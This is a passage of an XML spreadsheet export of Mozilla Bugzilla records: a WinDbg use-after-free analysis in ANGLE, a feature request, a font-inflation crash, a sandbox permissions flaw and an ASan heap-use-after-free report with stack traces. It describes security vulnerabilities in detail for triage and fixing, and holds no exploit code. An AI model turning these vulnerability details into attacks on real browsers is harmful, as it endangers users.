	010fe0a8 682ce03e 00008892 00000877 1159b000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
	010fe0e0 6817cb2e 00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
	010fe160 672dee29 075a2000 010fe1b8 118db800 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x2d8
	010fe204 672de265 00000000 075a2000 00000000 xul!js::InternalCallOrConstruct+0x5b9
	010fe228 672eb010 075a2000 00000001 11b3d200 xul!InternalCall+0xb5
	010feb68 67864471 010fec80 010fec80 010fec80 xul!Interpret+0x5990
	010febf8 672deb00 075a2000 010fec70 010fed30 xul!js::RunScript+0x231
	010fec94 672cbfb8 00000000 010fedec 075a2000 xul!js::InternalCallOrConstruct+0x290
	010fecbc 672cb707 010fee38 010feed8 010fee08 xul!js::Call+0x81
	010fedb4 671916d5 010feed8 010fee38 010fee08 xul!JS::Call+0x107
	010feeac 67191550 075a2000 010feed8 11ad2adc xul!mozilla::dom::Function::Call+0x14f
	010ff004 6719133d 010ff038 11ad2adc 010ff080 xul!mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt;+0xc1
	010ff160 67192647 11ac8520 10f3dce0 11a82010 xul!nsGlobalWindow::RunTimeoutHandler+0x148
	010ff204 67190e54 11ac8520 0000000d 11ac8520 xul!mozilla::dom::TimeoutManager::RunTimeout+0x2b8
	010ff218 672b6373 11a6d910 11ac8520 11a82010 xul!mozilla::dom::`anonymous namespace'::TimerCallback+0x1f
	010ff290 672b62c4 115285c0 115285f4 00000000 xul!nsTimerImpl::Fire+0x9b
	010ff2cc 67193ae0 11a82010 0170e160 090d7a04 xul!nsTimerEvent::Run+0x45
	010ff2f0 67193a63 68f96ac4 010ff36c 67269171 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
	010ff2fc 67269171 11ab9240 01704980 6974b601 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
	010ff36c 67194b98 0170e160 6974b601 010ff387 xul!nsThread::ProcessNextEvent+0x14d
	010ff388 672678a7 010ff560 01704970 010ff560 xul!NS_ProcessNextEvent+0x16
	010ff3b0 67c133d1 010ff560 010ff560 00000000 xul!mozilla::ipc::MessagePump::Run+0xcc
	010ff3cc 673454f9 010ff560 c0f8122d 090d7a00 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x58
	010ff404 673454c8 0170e160 00000002 090d7a00 xul!MessageLoop::RunHandler+0x20
	010ff424 67535f2e 01704970 010ff560 010ff444 xul!MessageLoop::Run+0x19
	010ff434 67535cbd 090d7a00 01704970 010ff458 xul!nsBaseAppShell::Run+0x34
	010ff444 68a23084 090d7a00 01704970 090d7a00 xul!nsAppShell::Run+0x26
	010ff458 67c1338f 010ff560 01704970 010ff4a0 xul!XRE_RunAppShell+0x26
	010ff468 673454f9 010ff560 c0f81289 00000003 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x16
	010ff4a0 673454c8 0172a000 00000001 69019200 xul!MessageLoop::RunHandler+0x20
	010ff4c0 68a22d9b 01701040 0000000b 00000000 xul!MessageLoop::Run+0x19
	010ff62c 002b9ce9 0000000b 01701040 010ff64c xul!XRE_InitChildProcess+0x55f
	010ff658 002b7e22 6f1672e4 6f1672ec 013c7298 firefox!content_process_main+0x70
	010ff9e4 002b5e37 0000000c ffcd16c0 013cbd50 firefox!wmain+0x4e92
	010ffa2c 772b38f4 00e4f000 772b38d0 d8aedd39 firefox!__scrt_common_main_seh+0xf9
	010ffa40 77d65de3 00e4f000 d87b03d4 00000000 KERNEL32!BaseThreadInitThunk+0x24
	010ffa88 77d65dae ffffffff 77d8b7e7 00000000 ntdll!__RtlUserThreadStart+0x2f
	010ffa98 00000000 002b5ead 00e4f000 00000000 ntdll!_RtlUserThreadStart+0x1b
	FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp
	FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp
	FAULTING_SOURCE_LINE_NUMBER:  807
	FAULTING_SOURCE_CODE:  
	   803:             latestBuffer = stagingBuffer;
	   804:         }
	   805: 
	   806:         CopyResult copyResult = CopyResult::NOT_RECREATED;
	&gt;  807:         ANGLE_TRY_RESULT(storage-&gt;copyFromStorage(latestBuffer, sourceOffset, storageSize, 0),
	   808:                          copyResult);
	   809:         // If the D3D buffer has been recreated, we should update our serial.
	   810:         if (copyResult == CopyResult::RECREATED)
	   811:         {
	   812:             updateSerial();
	SYMBOL_STACK_INDEX:  0
	SYMBOL_NAME:  libglesv2!rx::Buffer11::updateBufferStorage+db
	FOLLOWUP_NAME:  MachineOwner
	MODULE_NAME: libGLESv2
	IMAGE_NAME:  libGLESv2.dll
	DEBUG_FLR_IMAGE_TIMESTAMP:  585bd734
	STACK_COMMAND:  ~59s ; kb
	BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db
	PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL_libglesv2!rx::Buffer11::updateBufferStorage+db
	FAILURE_PROBLEM_CLASS:  INVALID_POINTER_READ_IN_CALL
	FAILURE_EXCEPTION_CODE:  c0000005
	FAILURE_IMAGE_NAME:  libGLESv2.dll
	FAILURE_FUNCTION_NAME:  rx::Buffer11::updateBufferStorage
	FAILURE_SYMBOL_NAME:  libGLESv2.dll!rx::Buffer11::updateBufferStorage
	FAILURE_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL_c0000005_libGLESv2.dll!rx::Buffer11::updateBufferStorage
	ANALYSIS_SOURCE:  UM
	FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_in_call_c0000005_libglesv2.dll!rx::buffer11::updatebufferstorage
	FAILURE_ID_HASH:  {7530445f-e192-bd84-04e5-903b912a400c}
	Followup:     MachineOwner
	---------
Variables shows that the storage object had been freed:
	storage	0x11ab9280 class rx::Buffer11::BufferStorage *
	 angle::NonCopyable	class angle::NonCopyable
	 __vfptr	0xe5e5e5e5 
	 mRenderer	0xe5e5e5e5 class rx::Renderer11 *
	 mRevision	0xe5e5e5e5
	 mUsage	0n-437918235 (No matching enumerant)
	 mBufferSize	0xe5e5e5e5
	sourceOffset	0
	storageSize	0xa42
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult&lt;rx::Buffer11::BufferStorage *&gt;
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult&lt;enum rx::`anonymous namespace'::CopyResult&gt;
	ANGLE_LOCAL_VAR	class gl::ErrorOrResult&lt;rx::Buffer11::NativeStorage *&gt;
	copyResult	&lt;Value unavailable&gt;
	latestBuffer	0x11afc280 class rx::Buffer11::BufferStorage *
	rx::BufferD3D::mNextSerial	&lt;Value unavailable&gt;
	this	0x11afc280 class rx::Buffer11 *
	 __vtcast_rx::Buffer11::NativeStorage	class rx::Buffer11::NativeStorage
	 rx::BufferD3D	class rx::BufferD3D
	 mRenderer	0x68f8ec90 class rx::Renderer11 *
	 mSize	0x68f8bc90
	 mMappedStorage	0x00000000 class rx::Buffer11::BufferStorage *
	 mBufferStorages	class std::array&lt;rx::Buffer11::BufferStorage *,8&gt;
	 mDeallocThresholds	class std::array&lt;unsigned int,8&gt;
	 mIdleness	class std::array&lt;unsigned int,8&gt;
	 mConstantBufferRangeStoragesCache	class std::map&lt;long,rx::Buffer11::ConstantBufferCacheEntry,std::less&lt;long&gt;,std::allocator&lt;std::pair&lt;long const ,rx::Buffer11::ConstantBufferCacheEntry&gt; &gt; &gt;
	 mConstantBufferStorageAdditionalSize	0
	 mMaxConstantBufferLruCount	0
	 mStaticBroadcastChannel	class angle::BroadcastChannel
	 mDirectBroadcastChannel	class angle::BroadcastChannel</t>
        </is>
      </c>
      <c r="X2065" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" t="n">
        <v>121247</v>
      </c>
      <c r="B2066" t="inlineStr">
        <is>
          <t>2002-01-22 09:11:16 -0800</t>
        </is>
      </c>
      <c r="C2066" t="inlineStr">
        <is>
          <t>enter_bug comment templates</t>
        </is>
      </c>
      <c r="D2066" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E2066" t="n">
        <v>1</v>
      </c>
      <c r="F2066" t="n">
        <v>1</v>
      </c>
      <c r="G2066" t="n">
        <v>4</v>
      </c>
      <c r="H2066" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2066" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2066" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2066" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2066" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2066" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2066" t="inlineStr"/>
      <c r="Q2066" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2066" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2066" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2066" t="n">
        <v>1</v>
      </c>
      <c r="U2066" t="n">
        <v>0</v>
      </c>
      <c r="V2066" t="n">
        <v>13</v>
      </c>
      <c r="W2066" t="inlineStr">
        <is>
          <t>following on from a post I made to the webtools group and the comments I got 
back hows about .....
here a suggestion to some functionality that I think is useful ..........
I've implemented this on my system my manually changing the enter_bug.cgi so
that each link on the "pick a product" page includes text like
"&amp;comment=TEMPLATE%20FOR%20EACH%20PRODUCT" at the end of the query string.
This way I can end up with say the following automatically appearing in the
comment field...
----------------------
Database :
Test-up : webserver on machine.myorg.com
Some Other1 :
Some Other2 :
Bug Details :
----------------------
It would be nice to have another field in the product table to store the
template for each product and then a little cgi to edit the templates......
the default template for each product would of course be blank.
myk@mozilla.org agreed that "Still, these templates could be useful for, among 
other things, imposing the kind of structure on bug submissions that is called 
for in b.m.o.'s bug writing guidelines or created by the Bugzilla helper."</t>
        </is>
      </c>
      <c r="X2066" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2067">
      <c r="A2067" t="n">
        <v>718290</v>
      </c>
      <c r="B2067" t="inlineStr">
        <is>
          <t>2012-01-15 07:12:28 -0800</t>
        </is>
      </c>
      <c r="C2067" t="inlineStr">
        <is>
          <t>Crash [@ ClearAllTextRunReferences] with font inflation and 'white-space' that preserves newlines</t>
        </is>
      </c>
      <c r="D2067" t="inlineStr">
        <is>
          <t>2013-12-10 10:00:46 -0800</t>
        </is>
      </c>
      <c r="E2067" t="n">
        <v>1</v>
      </c>
      <c r="F2067" t="n">
        <v>1</v>
      </c>
      <c r="G2067" t="n">
        <v>3</v>
      </c>
      <c r="H2067" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2067" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2067" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2067" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2067" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2067" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2067" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2067" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+] readability</t>
        </is>
      </c>
      <c r="Q2067" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2067" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2067" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T2067" t="n">
        <v>1</v>
      </c>
      <c r="U2067" t="n">
        <v>0</v>
      </c>
      <c r="V2067" t="n">
        <v>52</v>
      </c>
      <c r="W2067" t="inlineStr">
        <is>
          <t>Created attachment 588736
testcase
1. Create a new profile.
2. Set user_pref("font.size.inflation.minTwips", 3000);
3. Load the testcase in a debug build of Firefox.
4. Quit Firefox.
Result: Crash [@ ClearAllTextRunReferences] during shutdown.
I think it crashes while trying to evaluate an assertion condition, which might explain why it's debug-only.</t>
        </is>
      </c>
      <c r="X2067" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" t="n">
        <v>1562582</v>
      </c>
      <c r="B2068" t="inlineStr">
        <is>
          <t>2019-07-01 02:56:27 -0700</t>
        </is>
      </c>
      <c r="C2068" t="inlineStr">
        <is>
          <t>browser-plugin.js has a sandbox related issue which allows content process to set arbitrary permissions</t>
        </is>
      </c>
      <c r="D2068" t="inlineStr">
        <is>
          <t>2020-08-07 19:00:04 -0700</t>
        </is>
      </c>
      <c r="E2068" t="n">
        <v>1</v>
      </c>
      <c r="F2068" t="n">
        <v>1</v>
      </c>
      <c r="G2068" t="n">
        <v>6</v>
      </c>
      <c r="H2068" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2068" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J2068" t="inlineStr">
        <is>
          <t>Security: Review Requests</t>
        </is>
      </c>
      <c r="K2068" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2068" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2068" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2068" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2068" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+]</t>
        </is>
      </c>
      <c r="Q2068" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2068" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2068" t="inlineStr">
        <is>
          <t>Firefox 70</t>
        </is>
      </c>
      <c r="T2068" t="n">
        <v>1</v>
      </c>
      <c r="U2068" t="n">
        <v>0</v>
      </c>
      <c r="V2068" t="n">
        <v>11</v>
      </c>
      <c r="W2068" t="inlineStr">
        <is>
          <t>[browser-plugins.js#44](https://searchfox.org/mozilla-central/source/browser/base/content/browser-plugins.js#44) has a broken security model. One of the parameters that it `receiveMessage`s from the child is `message.data.plugin`. This includes information about the plug-in to show the "click-to-play" prompt. The problem is that it takes the permissions that is used in the call to `Services.perms.addFromPrincipal` from the child. In my testing it was possible to add "uitours" permission to an arbitrary host. 
There is a mitigation in that it did actually require the user interaction to "click-to-play" but then it added the wrong permission.  Because of the mitigation here, and because it's _only_ permissions, which for the most part aren't that powerful, I'm rating this sec-moderate. That said, its a simple fix and we really should do something about it.
To see the code flow for that bad path, see the LGTM query [here](https://mozilla.demo.semmle.com/query/5493105358251619941/). Scroll to bottom and then click "Show Paths" to see the vulnerable data flows.
I confirmed this was a bug by testing in the debugger, and modifying the permissionString value at /browser-plugins.js#44.</t>
        </is>
      </c>
      <c r="X2068" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" t="n">
        <v>798691</v>
      </c>
      <c r="B2069" t="inlineStr">
        <is>
          <t>2012-10-05 21:47:41 -0700</t>
        </is>
      </c>
      <c r="C2069" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsDisplayBoxShadowOuter::Paint</t>
        </is>
      </c>
      <c r="D2069" t="inlineStr">
        <is>
          <t>2018-08-29 15:20:51 -0700</t>
        </is>
      </c>
      <c r="E2069" t="n">
        <v>1</v>
      </c>
      <c r="F2069" t="n">
        <v>1</v>
      </c>
      <c r="G2069" t="n">
        <v>3</v>
      </c>
      <c r="H2069" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2069" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2069" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2069" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2069" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2069" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2069" t="inlineStr">
        <is>
          <t>[asan][adv-main19+]</t>
        </is>
      </c>
      <c r="Q2069" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2069" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2069" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2069" t="n">
        <v>1</v>
      </c>
      <c r="U2069" t="n">
        <v>0</v>
      </c>
      <c r="V2069" t="n">
        <v>19</v>
      </c>
      <c r="W2069" t="inlineStr">
        <is>
          <t>Reproduces on trunk. Steps
1. Visit http://ie.microsoft.com/testdrive/Graphics/HP
2. Open print dialog using ctrl+p
3. Select any printer and enter.
=================================================================
==6937== ERROR: AddressSanitizer heap-use-after-free on address 0x7f95d27c5080 at pc 0x42f6b6 bp 0x7fff2af037f0 sp 0x7fff2af02fb8
WRITE of size 1 at 0x7f95d27c5080 thread T0
    #0 0x42f6b5 in memcpy ??:?
    #1 0x7f96206d4df8 in _cairo_surface_snapshot_copy_on_write gfx/cairo/cairo/src/cairo-surface-snapshot.c:140
    #2 0x7f961d4cbead in nsDisplayBoxShadowOuter::Paint(nsDisplayListBuilder*, nsRenderingContext*) layout/base/nsDisplayList.cpp:2294
    #3 0x7f961d403091 in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:3238
    #4 0x7f96204b53ff in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicThebesLayer.cpp:139
    #5 0x7f9620497455 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:822
    #6 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #7 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #8 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #9 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #10 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #11 0x7f96204922b9 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:589
    #12 0x7f961d4ba9fb in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const layout/base/nsDisplayList.cpp:1098
    #13 0x7f961d4b9751 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const layout/base/nsDisplayList.cpp:966
    #14 0x7f961d531253 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:1835
    #15 0x7f961d79c4e7 in nsSimplePageSequenceFrame::PrintNextPage() layout/generic/nsSimplePageSequence.cpp:763
    #16 0x7f961ec11ef3 in nsPrintEngine::PrintPage(nsPrintObject*, bool&amp;) layout/printing/nsPrintEngine.cpp:2824
    #17 0x7f961ec177d3 in nsPagePrintTimer::Run() layout/printing/nsPagePrintTimer.cpp:87
    #18 0x7f96202d4251 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #19 0x7f962020d073 in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:220
    #20 0x7f961fdd1ce0 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #21 0x7f962036281b in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
    #22 0x7f961faccb0d in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #23 0x7f961cdb82c4 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3848
    #24 0x7f961cdb939a in XRE_main toolkit/xre/nsAppRunner.cpp:3923
    #25 0x408d05 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #26 0x7f962681976c in ?? ??:0
0x7f95d27c5080 is located 0 bytes inside of 6844-byte region [0x7f95d27c5080,0x7f95d27c6b3c)
freed by thread T0 here:
    #0 0x432d90 in __interceptor_free ??:?
    #1 0x7f96203c22e6 in ~gfxAlphaBoxBlur gfx/thebes/gfxBlur.cpp:23
    #2 0x7f961d4cbead in nsDisplayBoxShadowOuter::Paint(nsDisplayListBuilder*, nsRenderingContext*) layout/base/nsDisplayList.cpp:2294
    #3 0x7f961d403091 in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:3238
    #4 0x7f96204b53ff in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicThebesLayer.cpp:139
    #5 0x7f9620497455 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:822
    #6 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #7 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #8 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #9 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #10 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #11 0x7f96204922b9 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:589
    #12 0x7f961d4ba9fb in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const layout/base/nsDisplayList.cpp:1098
    #13 0x7f961d4b9751 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const layout/base/nsDisplayList.cpp:966
    #14 0x7f961d531253 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:1835
    #15 0x7f961d79c4e7 in nsSimplePageSequenceFrame::PrintNextPage() layout/generic/nsSimplePageSequence.cpp:763
    #16 0x7f961ec11ef3 in nsPrintEngine::PrintPage(nsPrintObject*, bool&amp;) layout/printing/nsPrintEngine.cpp:2824
    #17 0x7f961ec177d3 in nsPagePrintTimer::Run() layout/printing/nsPagePrintTimer.cpp:87
    #18 0x7f96202d4251 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #19 0x7f962020d073 in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:220
    #20 0x7f961fdd1ce0 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #21 0x7f962036281b in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:208
    #22 0x7f961faccb0d in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #23 0x7f961cdb82c4 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3848
    #24 0x7f961cdb939a in XRE_main toolkit/xre/nsAppRunner.cpp:3923
    #25 0x408d05 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #26 0x7f962681976c in ?? ??:0
previously allocated by thread T0 here:
    #0 0x432e50 in malloc ??:?
    #1 0x7f9620c55760 in AlphaBoxBlur gfx/2d/Blur.cpp:384
    #2 0x7f96203c2a35 in gfxAlphaBoxBlur::Init(gfxRect const&amp;, nsIntSize const&amp;, nsIntSize const&amp;, gfxRect const*, gfxRect const*) gfx/thebes/gfxBlur.cpp:52
    #3 0x7f961d4741f0 in nsContextBoxBlur::Init(nsRect const&amp;, int, int, int, gfxContext*, nsRect const&amp;, gfxRect const*, unsigned int) layout/base/nsCSSRendering.cpp:4559
    #4 0x7f961d472401 in nsCSSRendering::PaintBoxShadowOuter(nsPresContext*, nsRenderingContext&amp;, nsIFrame*, nsRect const&amp;, nsRect const&amp;) layout/base/nsCSSRendering.cpp:1244
    #5 0x7f961d4cbead in nsDisplayBoxShadowOuter::Paint(nsDisplayListBuilder*, nsRenderingContext*) layout/base/nsDisplayList.cpp:2294
    #6 0x7f961d403091 in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:3238
    #7 0x7f96204b53ff in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicThebesLayer.cpp:139
    #8 0x7f9620497455 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:822
    #9 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
    #10 0x7f9620497295 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:838
    #11 0x7f9620494f8a in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) gfx/layers/basic/BasicLayerManager.cpp:931
